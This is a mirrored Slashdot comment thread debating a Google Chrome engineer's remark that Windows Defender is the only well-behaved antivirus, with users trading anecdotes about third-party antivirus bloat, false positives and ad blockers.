Slashdot Mirror
Google Chrome Engineer Says Windows Defender 'the Only Well Behaved Antivirus', Cites 'Tons of Empirical Data' (onmsft.com)
Days after former Firefox developer Robert O'Callahan said that antivirus security suites are not necessary, and AV vendors are of little help. A Google Chrome engineer has echoed the same message, reaffirming that Microsoft's built-in software is indeed the most well-behaved security suite. From a report: Apparently the disdain for 3rd party AV solutions runs deep amongst browser developers, as in response to the threads a Google engineer, Justin Schuh, had this to say: "Browser makers don't complain about Microsoft Defender because we have tons of empirical data showing that it's the only well behaved AV."
I tend to agree. I used to have third party anti-virus on the wife's machine and the kids' machine, but really the most effective malware prevention is to take away root/admin privileges altogether. Anti-virus doesn't protect against the stupidity of users. If they install malware, no anti-virus will stop them. Almost everything that the anti-virus software caught was benign and were false alarms. And despite being useless, the crap software was a resource hog.
I have since uninstalled anti-virus. I will do an occasional malware bytes scan, but have done so less and less frequently as I find little but tracking cookies.
So, yes, I agree with this report.
Now Microsoft will promptly fuck up Defender.
I have a friend who's a Windows Defender and he just goes on and on about how great Microsoft's products are. Pretty intrusive if you ask me.
I clicked on the link, get a popup asking me to disable my ad-blocker...fine. Done. Turns out the article is about a paragraph and just regurgitates some twitter garbage. Utterly useless site.
Antivirrus nowadays always try to install some sort of browser addon/plugin
What's this? russian troll army prefers that all Americans use Kaspersky?
The problem is that every company other than Microsoft has a built in conflict of interest. The AV software companies profit motives are not aligned with providing a good user experience. A good anti-virus system should be nearly invisible. Hard to convince customers to pony up a lot of money for security software unless you are always in their face and an anti-malware system that does this inherently results a bad product. Worse they have to keep tacking on extra "features" and products to convince customers their product is better than the next guys. Their business model is based on scaring customers so they buy their product based on perceptions rather than actually keeping them safe.
It's probably the "best-behaved" because it is one of the least effective anti-virus. It has terrible detection rates compared to its competitors. The other anti-virus programs may be pushier and embed themselves deeper into the host system, but that's necessary in order for them to (try to) root out the infections.
Arguably end-users do not need this sort of protection offered from better AV packages, that Microsoft's product is "good enough" for most users. Certainly, better Antivirus is no panacea; even the best scanner can still miss some viruses. Personally - having cleaned out too many virus-infected machines - I'd rather the end-user have the maximum available protection if only to slow down the infection rate a little, although that still doesn't help when the end-user deactivates the AV, never updates it or just flat-out ignores its warnings . But regardless of your opinion of the /necessity/ of the software, you can't simply judge Microsoft's offering without taking into consideration its effectiveness. It is "best behaved" (for whatever that means) because it simply /does less/.
These engineers forgot the most effective, powerful anti-virus product that is an absolutely essential install; the ad blocker.
const int one = 65536; (Silvermoon, Texture.cs)
SJW, n: "Someone I don't like, and by the way I'm a fuckwit" - AC
All the AVs today pretty much catch the same low-hanging fruit, and there's no good reason to buy a third-party bolt-on anymore.
That said, I'm getting annoyed with AV packages still not being able to flag things like base-64-encoded Powershell scripts or Office doc VBS scripts that make direct references to system libraries. Almost all the malware that's made it through our defenses in the past six months has used one of these two techniques (plus a little code obfuscation, but still), and none of the AV packages I've tested (via sites that scan against dozens of packages) have ever flagged any of the most effective offenders.
Far too often, antivirus products follow the "cable television" market strategy:
"Yes, we know you already pay us for a subscription, but we can get so much more out of you by forcing you to see all kinds of shit you really don't want, including adverts for all our other services."
And, in the case of free antivirus, this too:
"We can see that you really dont want our full package, otherwise you would have bought it instead of opting for the free version-- but we feel compelled to try to upsell you each and every possible opportunity, and wont relent at all. We will even be really obnoxious with your notification area, and make your system play audio adverts, because that's how much we really want you to have a subscription (but see the prior market strategy-- we wont let up on the ads even if you do!)"
They invest tons of resources (both computational and time-wise) into making needlessly flashy UIs with big colorful buttons, and scary "CSI: Miami"-esque dialogs, when really--- the part that really matters-- how well they can trap execution events without bogging the system down-- seems to get nearly no love, and appears to get shittier and shittier.
Then you have Windows Defender. It's so plain, you instinctively ignore its presence. Excepting on older XP systems, (where there was a CPU utilization bug), it runs with a very modest system footprint. It does not constantly vomit spam into your system tray, and does not try to milk you for additional service agreements, or to switch to a paid version. It behaves itself very well.
If Avast or AVG behaved like that, instead of trying to be garishly tawdry and whorishly self-promoting like prostitutes, and reduced their system resource consumption habbits accordingly, they would win hands down.
But no, fleecing idiots is much more profitable.
I started doing PC support in my Field with Grandmas and small business.
AV software WAS USEFUL in the XP/98 era. I would argue with slashdoters calling them morons for not running it as you had 1 min max before infection on Windows 2000 or XP with no firewall!!L
We all ran admin istrator aka root and Win32 even had account personation services. Gee a dialup with no firewall or shitty software one with IE 6 running Java and Adobe flash without a sandbox on a local admin account was the norm so what could possibly go wrong!!??
Vista god bless it made UAC, privilege speration, scrambled ram addresses with aslr, buffer overflow protected buffers in c/c++, and psuedo local admin accountants which instead used a token to run something. Thanks Theo from OpenBSD for inspiration.
Windows 10 goes further too by using x86 features to separate data from executable bits directly on the CPU and signed bootloaders.
AdBlock and sandboxed Adobe products and AdBlock all make Windows OK now. Not perfect, but OK.
I just reused an Asus sabertooth I threw out in storage 2 years ago . I thought it was broken! Why? Esset kept making my ssds loose data. I thought SATA ports were bad. Went thru 3 expensive ssds. It was my damn AV software glitching them.
Keep updates current, run AdBlock, DNS service like the free Norton DNS servers on your router's, and heaven sakes don't click everything you download and you will be fine in 2017. AV software forges SSL certificates too which is dangerous
http://saveie6.com/
I used to work for an AV vendor in their IT department. Others in my family have continued working in the software security industry for decades. They really are just bloated resource suckers with little value. As such, I haven't run anti-virus beyond windows defender for a little over 10 years, not even on my kids computers. They're kept up to date, ads are blocked on my network, and I have taught my kids how to recognize an executable from other kinds of files (thank god for re-enabling file extensions being shown, the stupidest Windows default of them all).
We had one virus when my daughter opened an email that gave her some nasty popups constantly. She learned a valuable lesson that day, but I was able to reverse it in less than an hour booting into safe mode and removing the files. Been fine otherwise.
This forum Sig is licensed under the LGPL.
That does rather presume you're running Windows.
Which, lets be honest, Windows is SO badly full of security holes compared to any other OS that Microsoft HAD to come up with Defender to avoid loosing all credibility.
Defender still appears to really just be an easy copout workaround for Microsoft, rather than them addressing the actual problem which is the fundamentally weak architecture of Windows itself.
Developers of new software sometimes bump into false positives, and they are either smart enough to avoid malware or never even notice when one gets past their installed virus scanner. So they prefer one of the weakest virus scanners.
[acts surprised]
RAV Antivirus was bought in 2003 by microsoft. Not long after that, microsoft came out with its own antivirus offering. Back in the day, RAV was the best out there, finding and cleaning things the other major makers missed. Hmmm
Regardless of anyone's particular sentiments on aPK (he doesn't bother me), black-holing garbage domain names (something something hosts file) and IP addresses (if possible) is an excellent source of additional protection.
After years of pain from the likes of Norton, McCafee, Sophos, Nod32 all of which can make you want to have a virus instead of the antivirus, Windows defender is the only one that hasn't compelled me to rip it out.
I think Windows Defender is better than any of the AV out there - and that this signifies that MS has finally found its core competency. It needs to get out of the OS business and stick to AV.
That said, no AV is a poor prospect too, especially for business. I work for a local break-fix shop that also is branching into MSP work for out small to mid biz clients. Out system uses a modified Bitdefender + site blacklisting. It works well but does have a foot print. I say it is useful though because some of our clients are 30-50 seat law firms, insurance companies, and financial institutions - you would not believe how heavily targed they are with social engineer attacks designed to install malware. Mostly through email attachments, but there have been DOS attacks, password attacks against open ports, and DNS redirect attacks.
User training is #1, but AV and good backups have saved the bacon more than once. We see constant removals of crypto virus installers, only 2x in the past 3 years has one actually gotten through by being too new for detection. How many would that be without an AV with a 95%+ catch rate?
Silence is a state of mime.
I was always a fan of Symantec. Their entire suite became a huge resource hog. But, it was always better in antivirus tests. Once I found out that Microsoft stops checking for viruses where the exploit has be fixed in Windows, that made sense. Defender just stopped checking for viruses that will do no harm to the system. Drops the overhead dramatically.
I don't use any AV software. I don't need to. I have ClamAV in a live session for customers. And that way there's no files locked.
...Browser makers don't complain about Microsoft Defender because we have tons of empirical data showing that it's the only well behaved AV....
There is more, a lot more, to an a/v than what is seen via the myopic view of a browser developer.
Did they also give ya the subscribe to the newsletter popup for the ultimate trifecta?
They're not glorifying effectiveness (though most testing shows they all are pretty equal now) instead they're explaining that Microsoft's solution behaves well with applications which is generally true as it's less invasive.
As a former developer of web browsers (6 years of it), I can confirm that from a developer's point of view, Microsoft hooks more cleanly into the sockets API than the other's I've used.
Don't get your panties in a bunch.
When I tried out Bit Defender in 2014, it would fill up my RAM, and I'd have to reboot once a day. It's been some time now, since I've used it, and I don't know if they ever got around to fixing that or not.
Learning about brewing beer, by brewing beer.
As soon as you agree to compensate my clients for lost data when ransomware sneaks in under Defender's nose, maybe I'll pay attention to that brown stuff you're spewing.
Chas - The one, the only.
THANK GOD!!!
Yeah - too late by then. Buh-bye!
AC, where did you read Beau's name? msmash posted this. You might have had more credibility had you gotten at least THIS right
Black-holing garbage domains (ad sources and trackers especially) is definitely a good idea but the problem with a hosts file is that you can't do wildcards, so while you can easily block "foo.domain.com" and "bar.domain.com", you can't block "{random string}.domain.com" unless you know what "{random string}" is in advance - to do that requires either a DNS based blocklist or some other software tool. That's getting to be a problem given that marketing/tracking companies are slowly (and it's taken them long enough) waking up to the possibilty that you can use "{random string}" as a wildcarded DNS entry to track whether a link was looked at or not just as effectively as a custom URL or cookie.
Also, to add to the GP's comment about the importance of an Ad-Blocker, let's not forget blocking auto-run of certain browser plugins and the ability to whitelist sites that can run JavaScript / save cookies.
UNIX? They're not even circumcised! Savages!
Anti-virus suites have one huge problem. They are worse than getting a virus. At least a virus tries to hide and not kill your system. AV programs have no such respect for the users.
Yes it's an anecdote! Were you expecting original research in a Slashdot comment?
At least they are kind enough to provide a "Continue without supporting us" link unlike WSJ SJW.
I had bitdefender installed on my machine about a year ago and I was writing c++ HPC software. Everything was compiled with the Intel compiler and mkl with profile guided optimizations. Bitdefender started detecting my binaries as virus infected and deleting them. This happened a few times and I disabled it for a month and later turned it back on with newer virus definitions and the same issue kept happening. It even detected some of the binaries I had on a shared drive and deleted them also.
The false positive rate on some of these scanners is just too high.
I will just stay with windows defender since it has not interfered with any of my debugging or profiling and has never deleted the software I am compiling.
Computer modeling for biotech drug manufacturing is HARD!
Strongly suspect the main reason the browser developers like Microsoft Defender as a "well behaved" AV is because it's purely a file level defence, and so doesn't interfere with the behaviour of the browser. Unlike many third party AVs, that will intercept internet traffic, looking for bad stuff before it hits your browser.
That's good from a browser point of view, because they don't have to deal with browsing problems being caused by the AV engine (for example, without whitelisting, ESET's engine will cause logins to my wireless router's web interface to break).
But it's not so good from an end user perspective, when malicious content is attacking the HTML / Javascript engines. There are trade offs to however you choose to manage your security, but I suspect for most people, actually using a good 3rd party paid-for AV is a good balance of having reasonably good protection without having to be overly pro-active in managing it.
Defender just gets on with its job with relatively little overhead or other intrusion. The same cannot be said of virtually any other AV suite. Even the "reputable" ones like McAfee, Norton etc seems to exist as a form of crapware these days and are so bloated and slow that any protection comes at a high price.
Well, it would be considering the Defender developers have full access to Windows.
"As a former developer of web browsers (6 years of it), I can confirm that from a developer's point of view, Microsoft hooks more cleanly into the sockets API than the other's I've used'
As a typical computer user with basic fucking logic, NO DUH Microsoft can more cleanly hook into its own API than others.
Still waiting on Serviscope_minor to wake up to fucking reality and realize that Jessica Price isn't going to fuck him.
Agreed. Twitter is an utterly useless site.
Large anything degrades performance. Period. The larger it is, the more resources it uses.
Hosts is garbage in the world of IPv6. Hosts is a piece of insecure shit cobbled together from the late 90s meant to identify computers on a local network with a name instead of IP address, and any serious security person never uses it as it's bypassed by the OS at will (and several programs with the right calls) now days anyways.
Still waiting on Serviscope_minor to wake up to fucking reality and realize that Jessica Price isn't going to fuck him.
I read the entire thread up to my standard filter level, and this is what I concluded: the singular of anecdote is "one size fits all".
It's pretty clear from what I've read here that for a low-value target, I'd just settle for the low-hanging fruit of Windows Defender, ad blocking, a DNS block list, etc.
It's also pretty clear that for a high value target (e.g. law firm, bank) where the minimum system install is a bulked-out i7 I'd elect to suffer the bloat & obtrusiveness in order to obtain the somewhat better catch rate of a first-tier third-party solution. The people working for these kinds of institutions are pretty demoralised to begin with, it will just look like business as usual (and so it is).
The other side of this is that "one size fits all" is directly connected to the competency porn carapace. "Well, I work for banks and law firms and YOU can't handle the truth". But what actually gets written is this "YOU can't handle compensating my clients for a 48-hour loss of service". This tends to be a person whose amygdala has swollen to such a painfully large size that he or she can no longer multiply 1% times 365 (the constant friction of a badly behaved "solution") and can only multiply 100% times 2 days (as specified under the total availability-loss Weimar Reparations Act).
Someone has obviously not used BitDefender.
Kriston
With normal use you would not find "several instances of different types of malware" in the first place...
I haven't run any virus checker other than the one built-in to Windows for years now. They all catch old or obvious viruses. None of them is going to catch a new, clever virus. There's not a whole lot in the middle. Add in the virus-like behavior of the AV itself, the performance-suck of most of them, and it just doesn't make any sense to use them.
As another poster pointed out: user error is the biggest cause of virus infection. Train your users, use Windows Defender as a sort of "sanity check", make regular backups, and call it a day.
Enjoy life! This is not a dress rehearsal.
I have a strong instinct to take it with a bucket of salt when a stranger on the internet tells me "oh yeah, you should ditch your AV."
I think it's a bit more than just "Microsoft unfair advantage". Other AV products have always been monstrously bloated affairs, and have become all the worse over then last decade as they throw all kinds of other shit like firewalls and the like in. Products like mcafee and Norton have become almost as bad as the disease they purport to treat. So far as I can tell, Defender really doesn't do much more than sniff out viruses and malware, and while I agree Microsoft's insider knowledge probably gives it a bit of an edge, I think the narrower intent of the software has a lot to do with its better performance.
The world's burning. Moped Jesus spotted on I50. Details at 11.
I've been running my company on MSE/FEP/Defender for the past 6 years with zero headaches caused by the anti-virus software itself and an infection rate of maybe 5 or 6 per year across 200 PC and laptops. Users have local admin rights. Perimeter IDS catches some things that get through.
It seems to work better than any other anti-virus I've used and I hate them all. It's certainly the least annoying.
BitDefender on OSX is terrible. I wouldn't recommend it to anyone for any reason. It often thrashes the CPU, increasing heat, battery usage, and obviously having a massive impact on disk performance on overall system responsiveness. I've never used it on Windows, and likely never will. Windows Defender has always been fine for me on Windows, I've tried McAfee etc in the past, and they've all been much more trouble than they're worth. I can't deal with the massive performance loss, and strange abnormalities that often impede software testing brought about by AV software meddling in the filesystem and network layer.
There's a reason so many otherwise useful programs try to smuggle AV onto your machine unless you happen to notice it, and opt out. It's because nobody would willingly subject themselves to that.
Code, Hardware, stuff like that.
In the land of the Blind-and-Stupid, those that are only blind or only stupid have an advantage.
Insert presidential election comparison here.
Table-ized A.I.
Questions:
Does Windows Defender try to do other things besides defending?
Does Microsoft use Windows Defender as a way of gaining control over a computer?
Sorry, but in business, if you care about your data you go belt AND suspenders.
You run a multi-layer backup strategy.
You run antivirus.
You don't use "server" devices as someone's workstation.
Etc, etc.
Sure, your chances, especially with an intelligent, tech-savvy userbase are tiny.
But security is about more than just obvious stuff. And if you can catch corner-cases, so much the better. Less effort and cost for the client in the long run.
Chas - The one, the only.
THANK GOD!!!
I use Bit Defender and it didn't react at all like what I could read here (i.e. RAM filled etc,..) It's not taxing my computers like I've seen other packages do and it's not nagging me constantly. I think the heuristic scan graph should be evaluated, from https://chart.av-comparatives.... , NOT the file detection which relies on known patterns. Heuristic will be much more taxing for your CPU/RAM and also shows the logic of an AV. (Windows) Defender is the base of comparison in this chart, just to show how low it is... Bit Defender is the big dog in this chart.
Antivirus software is a hot topic in IT security right now. Not because you need AV, but because most AV is terribly designed and breaks security in other applications. And while Windows Defender may not score particularly well on canned tests used by AV reviewers, it doesn't break as much software as other AVs do.
Remember that in order to work, AV has to inject itself all over the place in your system to intercept network activity, disk activity, etc. But if it does that at the expense of other security measures, is it really helping? As Justin Schuh said in his linked post, when Firefox implemented Address Space Layout Randomization (ASLR) to guard against buffer overflows, lots of AV suites disabled it by replacing Firefox's DLLs with their own which didn't feature ASLR. This stuff happens all the time, because AV vendors are always behind the curve in browser security compared to browser developers. Which isn't all that surprising if you think about it.
The upshot is, all AV software is pretty terrible. MS Defender isn't as good as some other AV suites at passing the canned tests that AV review sites throw at them. But at least it doesn't work against web browsers' built-in security measures.
Thanks for your reply.
"... the most they [Microsoft managers] want is information on how to be either a middleman or true supplier for the things you want to buy."
That seems correct to me. However, it seems to me that Microsoft managers have little social ability. They can be self-destructive and not detect that they are being self-destructive. One example: In Windows 10, Microsoft tries to sell "APPS" to people who are employees of companies doing routine work.
It seems to me that Microsoft managers saw the success of Google's Android and search abusiveness, and wanted some of that success for themselves.
Most AV software is bloated crap that offers little actual security.
Microsoft has been focusing on power efficiency and battery life, so I'm not surprised if they traded off a little detection capability in order to run smoother.
Antivirus isn't even on the top of the list for avoiding an infection. That would be (1) don't browse as admin, (2) keep software updated, and (3) use an adblocker or filtering proxy.
With the vast majority of malware being drive-by downloaders, a good adblocker or filter offers more security and better performance. Antivirus is for suckers these days.
Serious host protection includes active IPS and/or application whitelisting, often in lieu of antivirus.
---
According to the latest ruleset, this post should be modded as Vorpal Flamebait +5.
AV software for anyone that has had to use it for any amount of time can easily tell you that Windows Defender is the *only* AV software anyone should be using anymore. Back in the day, there were a number of products out there which I would call good. Now, probably due to increased pressure for more profits, subscriptions, and increased monetization of every aspect of their business I wouldn't want any of them. Not only are they all bloated resource hogs, they cause more problems than viruses they catch. I'd rather have the viruses as at lease you don't pay for those. I don't know how many times I've had to look at friends or family members computers to find that some commercial AV software was causing all sorts of trouble. Is Defender the best at finding viruses? I don't know, perhaps not, but I do not care. I'd rather something that provides most protection but isn't intrusive enough that it acts more less like what it is trying to detect and remove.
I'd say there is one little cravat to the above. I'm referring specifically to ANTI-VIRUS software. An awful lot (if not most nowadays) of "malware" might be better categorized as "Adware". There are a number of products out there that do a good job dealing with Adware. Most Adware of course targets your various browsers. I'd say as a rule there are a lot more of those out there in the wild than actual "viruses". Anyway I would use both, Defender for viruses, and another product more specifically focused on Adware.
For a variety of reasons years ago I used to run an unpatched Windows 7 machine. That things was like a virus trawler! At any rate I had a lot of opportunity to use a host of tools and software. Having a good firewall (and setup), not going to sketchy websites, or clicking on stupid things goes a long way by itself. However inevitably you'd get things that require clean up. As mentioned somethings worked better than others, and some were as bad as the viruses they were supposed to protect you from. With that particular system, I think one of the easiest (provided your are prepared) and certain things I didn't was about every years or so I would just wipe the whole thing clean, do a fresh install, restore files from backup. Get used to doing it a few times and it takes a few hours, and you can automate most of it.
It's nice to have the firewall though. Windows does not have a reasonable alternative. Some other features that AV packages have can be handy when setting up systems for relatives who are clueless about computers, like warning when a site is potential spam, your credit card number is going out in the clear, and so forth. Most malware these days is coming over the web browser so first line of defense should be there, and the AV is just to help catch what gets through.
Nice Fanboi flamebait post. Beau, did MicroShaft PAY you to put this up?
I can back this up based on my end-user servicing experience, and I'm not even a Microsoft fan. Recent versions of Windows before 10 are better protected with Microsoft Security Essentials (free from MS) plus periodic manual scans with MalwareBytes Free than the bloated antivirus scanners that bog down PCs for the first hour after every reboot. In Windows 10, the antivirus is finally built in once again, so long as you enable Windows Defender.
On OS X, the built-in Xprotect is the only antivirus you need. Watch for 'social engineering' malware installs ("the email I clicked on looked just like it was from the bank, so I entered my machine password when it asked me to") and browser redirects.
You can do the wild cards with a router based DNS server. Though this is not as easy and turnkey as an adblocker.
> Other AV products have always been monstrously bloated affairs, and have become all the worse over then last decade
Additionally, even decent antivirus tends to bloat over time.
Avira Antivirus and MalwareBytes Anti-Malware both have "web protection" modules that will not stop nagging you if you disable them, for example.
SecureAplus has white-listing as well as anti-virus.
My wife's computer and my daughter's computer were always becoming malware infested. Since using SecureAPlus with the whitelist restriction turned on we haven't had any problems. Now whenever a non-whitelisted program tries to run, they full-stop until I check it out. Plus the AV allegedly runs using multiple AV engines in The Cloud.
What about Windows' firewall makes it unreasonable? Honestly curious here.
Karma: Poor (Mostly affected by lame karma-joke sigs)
When my wife went to the New York Times website and was infected by an ad, I decided ad blockers were a really good idea.
"When you have eliminated the unacceptable, whatever is left, however improbable, must be the truthiness" - Holmes
Exactly.
How does it happen that a huge organization lacks the simplest insight?
Well, last I looked it was pretty lacking. Maybe they've improved it over time?
Lacking what?
Karma: Poor (Mostly affected by lame karma-joke sigs)
You mean just like every other OS?
I don't recall any OS that was immune to malicious code, can you point me to one?
APK likes to ask for responses to the same things over and over. Maybe he just likes the responses?